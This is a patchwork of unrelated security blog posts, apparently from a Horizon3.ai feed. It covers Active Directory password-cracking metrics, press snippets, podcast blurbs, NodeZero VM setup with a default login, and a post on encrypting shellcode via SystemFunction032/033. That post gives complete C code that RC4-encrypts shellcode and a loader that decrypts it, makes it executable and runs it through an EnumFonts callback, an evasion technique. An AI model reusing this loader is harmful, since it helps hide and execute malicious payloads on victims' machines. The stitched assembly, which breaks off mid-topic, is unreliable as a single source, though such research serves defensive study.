
Metrics That Matter: An Attacker’s Perspective on Assessing Password Policy

After compromising a Windows domain controller, one of the actions that NodeZero, our autonomous pentest product, performs is dumping all domain user password hashes from the Active Directory database. This is a common attacker technique, and the resulting dump is highly valuable to attackers. But did you know that this data is a great source of insight for defenders too?

In this post we’ll talk about different metrics NodeZero gathers from analyzing password hashes in the Active Directory database. You’ll see how these metrics can be used to gauge how susceptible your organization is to common attacks that take advantage of weak passwords: password cracking, password spray, and credential reuse. These metrics can then be used as a lever to adjust password policy, improving the long-term cyber resilience of your organization.

Credential Analytics

Password Cracking Metrics

After dumping password hashes from a domain controller, NodeZero attempts to crack them all. This cracking is done without the need to set up dedicated hardware (e.g. GPUs). NodeZero uses a regularly updated wordlist containing billions of potential passwords, including all publicly disclosed breached passwords. NodeZero also tries to crack hashes based on contextual terms such as a company’s name and domain names.
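To illustrate the wordlist approach, here is a minimal Python sketch of contextual candidate generation. The function name, mutation suffixes, and example terms are all hypothetical; NodeZero’s actual generation logic is not public.

# Hypothetical sketch: combine a breached-password wordlist with simple
# mutations of contextual terms (company name, domain). Not NodeZero's
# actual logic -- just the general technique.
def candidates(contextual_terms, breached_wordlist):
    yield from breached_wordlist
    for term in contextual_terms:
        for suffix in ("", "1", "123", "!", "2023", "2023!"):
            yield term + suffix
            yield term.capitalize() + suffix

for pw in candidates(["horizon3", "example.com"], ["password", "letmein"]):
    print(pw)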

If NodeZero is able to crack any hashes for active users, NodeZero will surface a weakness entitled Weak or Default Credentials - Cracked Credentials from Active Directory Services Database (NTDS).

The proof for this weakness will contain a summary report with metrics covering:

  • Number and percentage of users whose password hashes were cracked

  • Number of cracked accounts broken down by user status (enabled or disabled)

  • Number of cracked accounts broken down by cracking method (empty password, based on username, known breached password, or using a contextual term)

  • Number of cracked accounts broken down by password length

  • Number of cracked accounts with passwords appearing in the list of the top 100, top 1000, and top 10000 worst known passwords

Also included in the proof is the list of active accounts whose passwords were cracked and the methods used to crack them.

Password Similarity Metrics

In addition to hash cracking, NodeZero analyzes the data dump for password reuse: cases where different users are using the exact same or similar passwords. If at least two active users are found to be using the exact same or similar password, NodeZero surfaces a weakness entitled Password Reuse Found in Active Directory Services Database (NTDS).

Password reuse analysis can be done even if no passwords are cracked. Password hashes are dumped from the Active Directory database in NTLM format; an NTLM hash is an unsalted MD4 hash of the password. This means that two accounts with the same NTLM hash are using the same password.
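Because the hashes are unsalted, reuse detection reduces to grouping identical hash values. A minimal Python sketch of the idea (account names and passwords here are made up; note that MD4 support in hashlib depends on the underlying OpenSSL build):

import hashlib
from collections import Counter

def ntlm(password: str) -> str:
    # NTLM is the unsalted MD4 digest of the UTF-16LE encoded password.
    # MD4 availability via hashlib depends on the OpenSSL build.
    return hashlib.new("md4", password.encode("utf-16le")).hexdigest()

# Hypothetical dump: identical hashes imply identical passwords,
# so reuse is visible without cracking anything.
dump = {
    "alice": ntlm("Spring2023!"),
    "bob": ntlm("Spring2023!"),
    "carol": ntlm("hunter2"),
}
counts = Counter(dump.values())
reused = [user for user, h in dump.items() if counts[h] > 1]
print(reused)  # ['alice', 'bob']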

If NodeZero is able to crack any password hashes, it goes one step further in its analysis. It compares cleartext passwords with each other to see how similar they are based on the normalized edit distance metric. If two cleartext passwords are at least 70% similar, then NodeZero presumes that an attacker would be able to guess one password from the other.

For instance, suppose we’re comparing two cleartext passwords: Horizon3 and Horizon1!. The edit distance between these two passwords is 2, because 2 modifications are required to turn the first password into the second.

  1. Horizon3 → Horizon1 (replace 3 with 1)

  2. Horizon1 → Horizon1! (add !)

Based on this, NodeZero determines that these two passwords are ~78% similar – close enough for an attacker to easily guess.
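A minimal Python sketch of this similarity computation (the normalization by the longer string’s length is an assumption, but it is consistent with the ~78% figure above):

def levenshtein(a: str, b: str) -> int:
    # Classic dynamic-programming edit distance (insert/delete/substitute).
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete
                           cur[j - 1] + 1,              # insert
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]

def similarity(a: str, b: str) -> float:
    return 1 - levenshtein(a, b) / max(len(a), len(b))

print(round(similarity("Horizon3", "Horizon1!"), 3))  # 0.778 -> flagged at a 70% threshold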

Using this type of analysis, NodeZero surfaces the following metrics in the proof for the Password Reuse weakness:

  • Number and percentage of active users using a password similar to another user

  • Worst case and average password reuse “blast radius”

    • This is a novel metric NodeZero surfaces to indicate the number of additional accounts that can be compromised if a single account is compromised. NodeZero assumes an attacker can simply take a compromised password or simple variation of it and attempt it against other accounts.
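A minimal sketch of how such a metric could be computed, assuming accounts have already been grouped into clusters of identical or similar passwords (the cluster contents are hypothetical):

# Each cluster holds accounts whose passwords are identical or >= 70% similar.
# An account's blast radius = the other accounts reachable from its cluster.
def blast_radius(clusters: list[list[str]]) -> tuple[int, float]:
    radii = [len(cluster) - 1 for cluster in clusters for _ in cluster]
    return max(radii), sum(radii) / len(radii)

worst, avg = blast_radius([["alice", "bob", "carol"], ["dave"]])
print(worst, avg)  # 2 1.5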

The top reused passwords are also provided in the proof.

Using Metrics to Gauge Attack Defense Readiness

Now let’s talk about how the metrics above can be used to assess an organization’s susceptibility to different types of attacks.

Defending Against Password Spray Attacks

In a password spray attack, an attacker starts with a list of users and a shortlist of probable weak passwords. The attacker tries (i.e. “sprays”) each password, one at a time, against all users in an attempt to compromise at least one account. Attackers are just trying to take over any account because they know that, once they’ve compromised a single account, they can abuse that account’s access to go further into the network. Password spray attacks are carried out both for initial access and lateral movement.

To avoid account lockouts, attackers usually perform password sprays over long periods of time, limiting the rate of login attempts. Suppose an attacker has a shortlist of 10000 passwords and is spraying at a rate of 4 attempts per hour. It would take the attacker more than 100 days to complete the spray. This means that, to defend against password spray attacks, it’s most important to eliminate any easily guessable passwords that would make an attacker’s shortlist. Even if a password hash is cracked, it doesn’t mean the password is easily guessable – it could be entry number 100,000,000 in a breached password list, and an attacker won’t realistically have the time to attempt it.
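A quick back-of-the-envelope check of that figure in Python:

passwords = 10_000          # attacker's shortlist size
rate_per_hour = 4           # lockout-safe attempt rate
hours = passwords / rate_per_hour
print(hours / 24)           # ~104 days to finish the spray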

So the metrics that matter most for guarding against password spray attacks are:

  • # Accounts cracked with passwords that appear in the list of top 10000 known worst passwords

  • # Accounts cracked with passwords that are derived from a user’s username

  • # Accounts cracked with passwords derived from a contextual term such as a company name

  • # Enabled accounts with empty passwords

Weak passwords in all of the above categories are ones attackers can easily come up with to generate a shortlist for spraying.

Defending Against Password Cracking Attacks

In a password cracking attack, an attacker has a password hash in hand and seeks to crack it to recover the cleartext. An attacker typically acquires hashes after initial access through attacks such as OS credential dumping, Kerberoasting, or LLMNR/NBT-NS Poisoning.

It is generally hard to defend against password cracking because motivated attackers may have significant cracking hardware at their disposal. Cracking hardware has matured to the point that the NTLM hash of any password of 8 or fewer characters can be cracked within a few hours. There are even publicly available rainbow tables for all NTLM-hashed passwords of 9 characters.

If NodeZero was able to crack any hashes at all, you can expect an attacker will also be able to crack them. It’s not unusual for NodeZero to crack more than 50% of an organization’s credentials.

The single best defense against password cracking attacks is to require long passwords. We recommend passwords at least 12 characters in length. This exceeds NIST’s guidance of an 8-character minimum.

The metrics that matter most for defending against password cracking attacks are:

  • # Accounts cracked (total amount)

  • # Accounts cracked with password length < 12 characters

Defending Against Credential Reuse Attacks

In a credential reuse attack, an attacker starts with a compromised account and tries to take over other accounts by attempting to log in with the same password or a similar one. This is typically carried out as part of lateral movement.

Organizations routinely have a common password or base term that is shared across many accounts. For instance, this base term could be derived from the password new users get when they first join an organization, or a temporary password used as part of a password reset, or a password used for test accounts.

If an attacker is able to compromise a single account using one of these common passwords, you can assume that all other accounts that share that password can also be easily compromised. An attacker may be able to significantly escalate his or her privileges depending on the level of access those additional accounts have.

The Password Reuse Blast Radius metric tracks the number of additional accounts that can be taken over if a single account is compromised. Below are the trackable metrics most useful for defending against the credential reuse attack technique.

  • Worst case password reuse blast radius

  • Average password reuse blast radius

It’s not uncommon for NodeZero to find hundreds of accounts sharing the exact same password or passwords derived from a single base term. Ideally all accounts should be using a unique and dissimilar password.

A Plan For Continuous Assessment and Improvement

The Metrics That Matter

The following chart summarizes the metrics gathered by NodeZero and how they can be used to assess your organization’s posture against different types of attacks.

Attack Type: Password Spray
MITRE Tactic Alignment: Initial Access, Lateral Movement, Credential Access
Metrics:

  • # Accounts cracked with passwords that appear in the list of top 10000 known worst passwords

  • # Accounts cracked with passwords that are derived from a user’s username

  • # Accounts cracked with passwords derived from a contextual term such as a company name

  • # Enabled accounts with empty passwords

Attack Type: Password Cracking
MITRE Tactic Alignment: Lateral Movement, Credential Access
Metrics:

  • # Accounts cracked (total amount)

  • # Accounts cracked with password length < 12 characters

Attack Type: Credential Reuse
MITRE Tactic Alignment: Lateral Movement, Credential Access
Metrics:

  • Worst case password reuse blast radius

  • Average password reuse blast radius

Horizon3’s Password Policy Recommendations

Based on the above, Horizon3 recommends the following organizational password policy. Our guidance extends and hardens the latest recommendations from NIST Special Publication 800-63B.

  1. All passwords must be 12 characters or longer
  2. No passwords matching the list of known breached passwords
  3. No passwords derived from dictionary terms
  4. No passwords derived from well-known contextual terms such as the company name, product, etc
  5. No passwords derived from well known information about the user such as the username, first name, or last name
  6. All passwords should be unique, and no passwords should be “too similar” to each other

There are a variety of tools to set and enforce password policy. For instance, if you’re using Azure AD, you can enable Azure AD Password Protection to automatically ban well-known bad passwords.

We recommend a program of continuously running NodeZero to verify your posture and adherence to password policy. NodeZero automatically surfaces the metrics in this post whenever it acquires domain admin rights, or if it’s set up to run with a domain admin credential. Check out the free trial here to learn more!


Phobia

Phobos ransomware, first discovered in December 2018, is another notorious cyber threat that targets businesses. Phobos is popular among threat actors of various technical abilities because of its simple design. In addition, the Greek god Phobos was thought to be the incarnation of fear and panic; hence the name Phobos was likely inspired […]

FBI Targeted by Russian Hackers in Latest String of Attacks Against U.S. Government Websites

ClearanceJobs: 11/18/22

“With the rise in successful cyber attacks against the United States government and its federal agencies, many are right to wonder whether the public sector’s approach to cybersecurity is in need of a serious change.”

Read the entire article here


Cloud security isn’t guaranteed because a provider is well-known, expert says

SC Media: 11/14/22

Brad Hong, customer success manager at Horizon3ai, said he and his team constantly see huge blast radii in attacks and penetration tests originate from the smallest misconfiguration, or even lack of configuration, allowing attackers to simply log in to public-facing environments.

Read the entire article here


Russian Software Found in Smartphone App Used by CDC and U.S. Army

ClearanceJobs: 11/14/22

“After being branded as an American company, the revelation of Pushwoosh being a Russian-originated software firm comes as yet another embarrassment to Apple and Google in the privacy domain,” explained Taylor Ellis, customer threat analyst at Horizon3ai.

Read the entire article here


Holiday Season Threat Awareness

As we approach the holiday season, it is important that our customers stay vigilant and continue a regular cadence of autonomous pentests. Although it’s the time of year for holiday cheer, we’ve seen cyber threat actors (CTAs) take advantage of lackadaisical company manning and low staffing.

The SolarWinds hack of September 2020 was “one of the biggest cybersecurity breaches of the 21st century”; the major software company was considered a highly lucrative target for CTAs based on its privileged access to IT systems. Specifically, the SolarWinds Orion IT monitoring software was targeted, allowing access to hundreds of thousands of organizations around the world, including portions of the US Government. Currently, nearly 30% of Horizon3 customers still use or have used SolarWinds applications in their networks, and two years later, 7% are still finding the SolarWinds Orion API Authentication Bypass Vulnerability (CVE-2020-10148) in their pentests.


Log4Shell: 2021’s worst holiday gift

Another example of a large-scale holiday season attack is the Log4Shell remote code execution (RCE) vulnerability (CVE-2021-44228), which surfaced right before Christmas in late 2021. On December 9, 2021, this new vulnerability was disclosed in the Apache Log4j open-source library, which is used in a large share of developed Java applications. Due to the proliferation of Log4j in Java, “the number of devices that could potentially be affected by the security vulnerability is approximately 2.5 – 3 billion.” CTAs can exploit a vulnerable application by sending crafted user input to it, hoping that the application will log their arbitrary code as input and allow them persistent access, as well as lateral movement. One year later, 64% of Horizon3 customers using NodeZero are still experiencing the CVE-2021-44228 vulnerability in their environment.

According to open-source research, below is the Apache Log4j timeline:

  • December 9, 2021 – Original vulnerability disclosed and first patch (2.15.0) was made available
  • December 14, 2021 – Second vulnerability disclosed and second patch (2.16.0) was made available
  • December 18, 2021 – Third vulnerability disclosed and third patch (2.17.0) was made available
  • December 28, 2021 – Fourth vulnerability disclosed and fourth patch (2.17.1) was made available

At the end of the day, attackers know that we want to take some time off and enjoy our families, because that is when we are at our weakest. CTAs use these “down times” to take advantage of low staffing and chaos surrounding the holidays to deploy new tactics, techniques, and procedures (TTPs), while also focusing on targets with the biggest bang for the buck.

Remaining vigilant throughout the holiday season will help ensure your systems and networks are secure, which is why adopting an autonomous approach to proactively finding those attack vectors can save your security team its most critical resource: time. Incorporating a regular pentest cadence will get you results quickly, so mitigations and verifications are timely, giving you much needed time to enjoy the holidays!

Albert Martinek is a Customer Threat Analyst with Horizon3.ai.


K-12 cybersecurity: Protecting schools from cyber threats | Guest Mike Wilkinson

Michael Wilkinson leads the digital forensics and incident response team at Avertium. The team is dedicated to helping clients investigate and recover from IT security incidents daily. Wilkinson talks about threat research, the threat of Vice Society, how K-12 cybersecurity can improve and much more.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Digital forensics and incident response 
3:12 - Getting interested in computers
6:00 - How had digital forensics changed over the years
9:03 - Handling overwhelming amounts of data
12:53 - The threat of Vice Society 
17:20 - Why is Vice Society targeting K-12?
19:55 - How to minimize damage from data leaks
24:25 - How schools can improve cybersecurity
25:54 - What schools should do if cyberattacked 
31:36 - How to work in threat research and intelligence
34:42 - Learn more about Avertium
36:40 - Learn more about Mike Wilkinson
37:08 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

Higher Education Organization Improves Cybersecurity Posture with NodeZero

When the director of technology for a higher education organization went looking for a better way to identify and prioritize security weaknesses on the school’s servers and networks, his first interaction with Horizon3.ai and NodeZero started off with an impressive bang.

“I wanted to see proof of concept, and Horizon3.ai solved one of our biggest security holes because of that PoC [proof of concept],” he says. On the first op, NodeZero was able to compromise the domain admin account. Not just one account, in fact, but four, via an LLMNR vulnerability.

“Without a lot of work, we were able to clean that up before we even licensed NodeZero – that was huge,” says their IT director.

Cybersecurity presents a complex challenge for the school, as it is spread out over several campuses and managed remotely. The director of technology is the highest-ranking technology staff member at the organization. The role oversees 400 endpoints, in addition to securing roughly 600 students on their own VLAN/subnet during the school year.

NodeZero offers more specificity

Previous pentesting options were helpful, but often left the team chasing down vulnerabilities that turned out to not actually be exploitable.

“Often, it was just informational, and didn’t really affect your security,” he says.

With Horizon3.ai, “One of the things that really struck me was that it isn’t just the tool – and the tool is fantastic – but it’s the people around the tool who are available, in the chat, scheduling meetings. When I was running the PoV (Proof of Value) someone was there.”

He was also sold on NodeZero by its capability to run on demand.

“What sold me on it was seeing it at work and, because we know security is a journey and not a destination, the idea of being able to continuously run scans and pentests is great,” he says.

The team now runs weekly pentests to maintain vigilant cybersecurity on their network, he notes.

Getting the most from your time

Time management and focused effort are huge in maintaining a strong security posture. Chasing down every lead with equal time and energy isn’t helpful when we know that not every vulnerability is actionable.

“You have critical down to informational severity issues, but I believe a tool a lot more when it says this is a critical misconfiguration we have compromised – oh and by the way, here’s your hashed password,” he says. “When that’s happened, I recognized the first and last character and knew that was the password.”

Context scoring based on critical impacts helps hammer home where to best deploy limited resources to secure the environment.

“It’s the difference between casing a house and saying how I might be able to break in – that window might not be locked, that door doesn’t seem secure. But if you can actually break in, that’s critical. It’s the difference between telling me something might happen versus something did happen.”

Easy fixes but you need to find them first

While the LLMNR vulnerability wasn’t a huge challenge to fix, discovering it was a bit of a shock, the Director of Technology explains – and that’s why regular tests are so helpful. Security is so expansive it’s hard to cover everything.

“We try to work to secure our network, but it’s possible for any organization to miss things or have little holes” in their security, he says. A solution like NodeZero can find those small gaps that leave the organization open to risks so the team can shore them up quickly and easily.

“With stuff like LLMNR, the fix isn’t hard if you have the tools to fix a lot of machines at once,” he says. It’s identifying those risks in the grander picture that is the real struggle.

NodeZero helps uncover what you don’t know, he says, and tells you how to fix it so you don’t spend time researching the answer.

“You’re not chasing your tail following a large list of vulnerabilities,” he says. “It cuts down the task of securing your network because you’re starting at the critical, most impactful things. You get a view of things you just aren’t going to have without a pentest.”

Since starting to incorporate NodeZero into their security profile, other features, such as external pentesting, have been released and added to the solution’s usefulness.

“There’s a lot of tools out there that just hand you the tool and you’re on your own,” he says.

“The support, being able to set up a time to answer a question, it’s all been helpful. They work with us as opposed to saying ‘We got ‘em, on to the next account.’”



NodeZero Host Virtual Machine

The NodeZero Host virtual appliance is a small virtual machine based on a pre-configured Ubuntu 20.04 installation. It’s designed to execute NodeZero pentests and bundles tools that facilitate pentest execution, as well as debugging and maintenance.

Downloads

IMPORTANT: Always verify that the files you download come from Horizon3.
VMWare / VirtualBox importable OVA: download
SHA-256: 7e1489f394a3d5d0c3d89916c2b6d5bea8e9df0fbed6cbfd45b8f5c0132cfae1
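One way to verify the download is to recompute the file’s SHA-256 digest and compare it to the value above; a minimal Python sketch (the local filename is assumed):

import hashlib

expected = "7e1489f394a3d5d0c3d89916c2b6d5bea8e9df0fbed6cbfd45b8f5c0132cfae1"

h = hashlib.sha256()
with open("NodeZero.ova", "rb") as f:           # assumed local filename
    for chunk in iter(lambda: f.read(1 << 20), b""):
        h.update(chunk)

print("OK" if h.hexdigest() == expected else "MISMATCH")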

Specs

The NodeZero virtual machine comes pre-configured to use these resources:

  • 2 x CPUs
  • 8GB of RAM
  • 40GB of disk
  • Bridged network adapter

Installation

Installing the virtual machine is a matter of importing the OVA file from the download link above into your virtualization environment. We provide the following set of steps as an example to use with VMWare’s vSphere client or with VirtualBox.

VMWare vSphere

vSphere client is one of VMWare’s virtual environment management solutions. You can find more information on the client itself in VMWare’s documentation.

NOTE: The following steps are for vSphere client version 7.0.3.00500.

After downloading and verifying the most recent NodeZero-####.ova file from the downloads section above, follow these steps to import and launch the NodeZero virtual machine.

  1. Log into your VMWare vSphere client.
  2. Select Deploy OVF Template from the Actions menu.
  3. Select the Local File option.
  4. Click the UPLOAD FILES button to locate the OVA file you downloaded earlier.
  5. Click Next.
  6. Give your VM a name if you want it to be different from the default, and select a location to deploy to.
  7. Click Next.
  8. Select the compute resources you’ll be using.
  9. Click Next.
  10. Verify the import settings are correct and that the signature is from Horizon3.
  11. Click Next.
  12. Select the storage destination.
  13. Click Next.
  14. Select a network to use.
  15. Click Next.
  16. Review your selections.
  17. Click Finish.
  18. To launch the VM, select it from the list on the left and click the Power On button.

VirtualBox

After downloading and verifying the most recent NodeZero-####.ova file from the downloads section above, follow these steps to import and launch the NodeZero virtual machine.

  1. Open VirtualBox.
  2. Click on Tools.
  3. Click on Import.
  4. Enter the location of the OVA file.
  5. Click Continue.
  6. Click Import and wait for it to complete.
  7. Make sure you use a bridged network adapter:
    • Select the newly imported NodeZero virtual machine from the list on the left.
    • Click Settings.
    • Click Network.
    • Check that Attached to: says Bridged Adapter.
    • Check that Name: is the name of the adapter connected to your internal network.
    • Click OK if you had to change anything.
    • NOTE: There are known issues with VirtualBox network bridges over wireless adapters in newer MacOS versions. If you’re experiencing connectivity problems, consider using a wired connection instead.
  8. Select the NodeZero virtual machine from the list on the left.
  9. Launch the VM by clicking Start.

Usage

Connecting

If using vSphere, once you power on the virtual machine, the client interface gives the option of using a web console or a remote console for your first login.

If using VirtualBox, after starting the VM, a new display window appears that shows the operating system load screen.

With either system, once the OS fully loads, you’ll see the NodeZero login screen, which displays the VM’s IP address.

Username and First Login

When first launching the NodeZero virtual machine, SSH password access is disabled until you log in and update the default password.

  1. Login with these credentials:
    • Username: nodezero
    • Password: nodezero
  2. When successful, you’ll see a prompt like the one below:
    You are required to change your password immediately (administrator enforced)
    Changing password for nodezero.
    Current password:
  3. Enter the password from step #1 and hit enter.
  4. Next you’ll see a New password: prompt; enter a secure password that you’ll use from now on and hit enter.
  5. Next you have to confirm the password at the Retype new password: prompt; enter the same password from step #4 and hit enter.
  6. You are now logged in with a successful password change. Make sure to keep that password for future use.

Once the login process completes, you’ll see an Enabling SSH password authentication message. At this point you can continue working through the vSphere or VirtualBox consoles, but you can also use an SSH client to connect to the IP address shown on the login screen.

Using SSH

To connect over SSH with Linux or MacOS, simply run the command below, replacing IP_ADDRESS with the one shown in the login screen.
$ ssh nodezero@IP_ADDRESS

If you’re using Windows, then you’ll use a client like PuTTY to connect. Simply fill out the Host Name (or IP Address) field with the address shown in the login screen.

Configuration with the n0 command

This virtual machine comes with a simple script that helps adjust basic settings and other maintenance tasks. It’s available under the n0 command, and running it presents you with a menu:

$ n0
1) Check environment
2) System info
3) Configure Static IP
4) Configure network proxy
5) Update
6) Version info

The following sections provide more information on what these options do.

Network configuration

Options #3 and #4 in the n0 command menu allow you to adjust network settings as follows.

Switching between DHCP and Static IP assignment

By default the NodeZero appliance comes with DHCP enabled. But if you need to switch to static addressing, you can use option #3 and follow the prompts to configure a new IP address, subnet, gateway, and DNS nameserver.

If you ever need to switch back to DHCP, you can use the same option.

Configure a network proxy

You’re also able to set up a proxy server for HTTP and HTTPS traffic. Simply select option #4 and follow the example in the prompt when entering the URL. Note that you’ll have to log out and back in before this change takes effect.

Checking things are working

Option #1 of the n0 command menu checks that the system is ready to execute a pentest. It verifies that the VM has access to the required resources and commands. It’s the same as running the Host Check Script.

Option #2 provides system information and can serve as a way to check your current settings. You’ll find details on the processors, memory, disk and network configuration.

Running a NodeZero pentest

  1. Log into the Horizon3 web portal.
  2. Schedule a new pentest following your usual process.
  3. Copy and paste the launch / curl command from the portal into the shell of a NodeZero virtual machine.
  4. The pentest starts executing.

Staying up to date

You can use the n0 command menu’s option #5 to perform an OS and tools update.


Behind the scenes of ransomware negotiation | Guest Tony Cook

Tony Cook of GuidePoint Security knows a lot about threat intelligence and incident response. But he’s also used these skills while working in ransomware negotiation! Cook has handled negotiations for all the big threat groups — REvil, Lockbit, Darkside, Conti and more — and he told me about what a ransomware negotiator can realistically accomplish, which threat groups are on the rise, and why negotiating with amateurs is sometimes worse and harder than dealing with elite cybercriminals. 

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Ransomware negotiating 
2:42 - How Tony Cook got into cybersecurity
4:00 - Cook's work at GuidePoint 
9:31 - Life as a ransomware negotiator 
11:41 - Ransomware negotiation in 2022
13:52 - Stages of a successful ransomware negotiation 
15:23 - How does ransomware negotiation work?
19:11 - The difference between threat-acting groups
20:43 - Bad ransomware negotiating
22:43 - Ransomware negotiator support staff
25:21 - Ransomware research
26:26 - Is cyber insurance worth it? 
29:14 - How do I become a ransomware negotiator? 
32:25 - Soft skills for a ransomware negotiator
33:46 - Threat research and intelligence work
37:45 - Learn more about Cook and GuidePoint
38:17 - Outro


Encrypting Shellcode using SystemFunction032/033

After a while, I’m publishing a blog post about something that caught my interest. With the recent tweets about the undocumented SystemFunction032 Win32 API function, I decided to quickly have a look at it. The first thing I noted after Googling this function was the source code from ReactOS. It seems the other SystemFunctions, starting from 001, map to other cryptographic and hash functions. SystemFunction032 is an RC4 implementation. This API is in the export table of Advapi32.dll.

The export table entry points to the DLL Cryptsp.dll which actually has the function implemented and exported.

Inside Cryptsp.dll, as you can see, SystemFunction032 and SystemFunction033 point to the same offset, which means loading either of these functions will perform the same RC4 encryption.

This is the disassembly of the function which does the RC4 encryption. It takes in the data and key structs as parameters.
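For reference, the algorithm this disassembly boils down to is plain RC4. A minimal Python sketch of standard RC4 (not the decompiled code itself, just the textbook algorithm for comparison):

def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA).
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA), XORed with the data.
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# RC4 is symmetric: encrypting twice with the same key round-trips.
ct = rc4(b"www.osandamalith.com", b"\x6a\x60\x5a\x68")
assert rc4(b"www.osandamalith.com", ct) == b"\x6a\x60\x5a\x68"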


Upon reviewing the ReactOS source code, it is quite straightforward to implement this in C and get our shellcode encrypted/decrypted.

I wrote a quick C program to encrypt a given shellcode.

#include <windows.h>
#include <stdio.h>

typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);

struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;

int main() {
	printf("[*] RC4 Shellcode Encrypter using Systemfunction032/033\n");
	puts("[*] Coded by: @OsandaMalith - www.osandamalith.com");

	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

	char _key[] = "www.osandamalith.com";

	unsigned char shellcode[] = {
		0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x29, 0xD4, 0x65, 0x48, 0x8B,
		0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B,
		0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE,
		0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57,
		0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48,
		0x01, 0xF7, 0x99, 0xFF, 0xD7 };

	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;

	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;

	SystemFunction033(&_data, &key);

	printf("\nunsigned char shellcode[] = { ");
	for (size_t i = 0; i < sizeof shellcode; i++)
		printf("0x%02X%s", shellcode[i], i < sizeof shellcode - 1 ? ", " : " ");
	puts("};");

	return 0;
}

Once the encrypted shellcode is obtained the below can be used to decrypt and execute the shellcode.

#include <windows.h>
/*
 * RC4 Shellcode Decrypter using Systemfunction032/033
 * Coded by: @OsandaMalith - www.osandamalith.com
 */
typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);

struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;

int main() {
	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

	char _key[] = "www.osandamalith.com";
	
	unsigned char shellcode[] = {
		0x5f, 0xfc, 0xb3, 0x2c, 0x87, 0xd5, 0xc1, 0xe8, 0x2b, 0xac, 0x12, 0x8f, 0x00, 0x5e, 0xef, 0xd3,
		0xd6, 0x3a, 0x04, 0x80, 0x05, 0xa1, 0x43, 0x45, 0x6a, 0xce, 0x2c, 0xf9, 0x58, 0x0f, 0x34, 0xdf,
		0xf8, 0x8b, 0x78, 0x63, 0xb4, 0x7a, 0xba, 0x5d, 0xdf, 0x14, 0x4f, 0x6b, 0xbf, 0xcd, 0x04, 0x44,
		0x53, 0x2f, 0x35, 0x15, 0x75, 0x56, 0x6a, 0xb6, 0xab, 0xd3, 0x7b, 0xcc, 0x03, 0xb6, 0x16, 0x4f,
		0x4b, 0x30, 0x01, 0x57, 0x58, 0xd8, 0xd0, 0x0b, 0x0b, 0xa0, 0xa1, 0x66, 0x98, 0x83, 0x7e, 0xdb,
		0x0d, 0x1a, 0x08, 0x41, 0x62, 0x62 };

	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;

	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;

	SystemFunction033(&_data, &key);

	// Make the decrypted shellcode executable.
	DWORD oldProtect = 0;
	VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);

	// Use the EnumFonts callback as an indirect way to execute the shellcode.
	EnumFonts(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char*)shellcode, 0);
}

Penetration tester Horizon3.ai identifies Fortinet exploit source, assists those checking for potential attacks

SiliconANGLE: 11/02/22

“We want to be to have a tool that can be used to exploit our customer system safely to prove that they’re vulnerable, so then they can go and fix it,” said James Horseman (pictured, right), exploit developer at Horizon3.ai.

Read the entire article here


Russia-Ukraine Conflict Heightens Wariness of Nation-State Attacks as 64% Of Businesses Believe They Have Been Targeted

CPO Magazine: 10/21/22

Well over half of the respondents not only believe that they have already been targeted by nation-state attacks, but have made changes to their cybersecurity practices due to the Russia-Ukraine conflict.

Read the entire article here


Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)


In October 2022, I came across a tweet from July 5th by @wdormann, who reported the discovery of a new method for bypassing MOTW, using a flaw in how Windows handles file extraction from ZIP files.

So if it were a ZIP instead of ISO, would MotW be fine?
Not really. Even though Windows tries to apply MotW to extracted ZIP contents, it's really quite bad at it.
Without trying too hard, here I've got a ZIP file where the contents retain NO protection from Mark of the Web. pic.twitter.com/1SOuzfca5q

— Will Dormann (@wdormann) July 5, 2022

